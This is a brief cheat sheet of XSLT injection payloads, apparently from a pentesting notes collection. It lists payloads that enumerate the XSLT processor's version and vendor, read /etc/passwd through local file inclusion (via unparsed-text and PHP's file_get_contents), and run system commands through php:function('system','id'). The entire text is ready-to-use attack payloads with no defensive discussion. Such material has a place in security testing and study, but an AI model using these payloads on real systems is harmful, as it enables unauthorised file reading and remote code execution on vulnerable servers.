Attacking XSLT

Injection for enumeration:

Version: <xsl:value-of select="system-property('xsl:version')" />
<br/>
Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br/>
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
<br/>
Product Name: <xsl:value-of select="system-property('xsl:product-name')" />
<br/>
Product Version: <xsl:value-of select="system-property('xsl:product-version')" />

LFI (XSLT 2.0 only):

<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />

LFI using PHP function:

<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

RCE:

<xsl:value-of select="php:function('system','id')" />